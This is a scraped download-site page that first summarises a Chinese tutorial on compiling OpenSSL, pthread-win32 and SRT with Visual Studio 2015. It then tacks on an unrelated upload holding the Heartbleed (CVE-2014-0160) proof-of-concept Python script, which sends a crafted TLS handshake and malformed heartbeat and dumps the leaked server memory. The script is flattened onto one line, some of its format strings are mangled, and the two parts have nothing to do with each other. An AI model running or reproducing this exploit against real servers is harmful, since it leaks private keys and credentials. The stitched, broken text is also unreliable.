Windows下C++11环境下OpenSSL、pthread与Srt库的VS2015编译教程

需积分: 13 4 下载量 9 浏览量 更新于2024-09-03 收藏 907KB DOCX 举报
本文档主要介绍了在Windows环境下使用Visual Studio 2015编译OpenSSL、pthread和SRT这三个开源库的过程。由于代码采用C++11标准,因此推荐使用VS2015以确保兼容性和性能。以下是详细的编译步骤: 1. OpenSSL编译: - OpenSSL可以从其官方网站下载:<https://github.com/openssl/openssl>。由于从GitHub直接下载的32位版本可能会遇到缺失文件问题,建议从官网下载。 - 首先,需要安装ActivePerl工具(版本5.26.3.0000),它用于运行Perl脚本,地址是:<http://www.activestate.com/ActivePerl>。确保注册并下载对应版本的MSWin32-x64安装包,安装后检查环境变量是否包含Perl路径。 - 接着,安装Nasm汇编器,从<http://nasm.sourceforge.net/> 下载nasm-2.14.03rc2-installer-x86.exe,配置Nasm路径至环境变量。 - 在Visual Studio 2015命令提示工具中,导航到OpenSSL源码目录(例如:D:\SRT_UDP\openssl-1.1.1d)。 - 使用`perlConfigureVC-WIN32`(64位编译使用`perlConfigureVC-WIN64A` 或 `perlConfiguredebug-VC-WIN64A`)进行配置。 - 然后执行`nmake`进行编译,最后通过`nmaketest`进行部分算法的测试(可选)。 - 编译完成后,会在根目录下生成所需的库文件。 2. pthread-win32编译: - pthread-win32库可以从<https://github.com/GerHobbelt/pthread-win32> 获取。下载源代码后,解压到指定目录(例如:D:\SRT_UDP)。 - 进入该项目目录,按照文档进行编译,通常包括设置编译选项、链接和构建过程,具体步骤未在提供的内容中详述,但一般会在项目的README或编译说明中找到指导。 3. SRT编译: - SRT的编译需要依赖于已经编译好的OpenSSL和pthread。确保这两个库都成功编译并可被链接。然后,根据SRT项目的文档指示,配置编译选项并在Visual Studio 2015环境中编译SRT。 在整个过程中,务必遵循文档中的指导,并可能需要根据自己的具体环境调整一些步骤。这些步骤确保了在Windows环境下使用C++11标准的VS2015编译OpenSSL、pthread和SRT库的成功。如果你在实际操作中遇到问题,记得查阅官方文档和相关社区的解决方案。
2014-07-22 上传
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False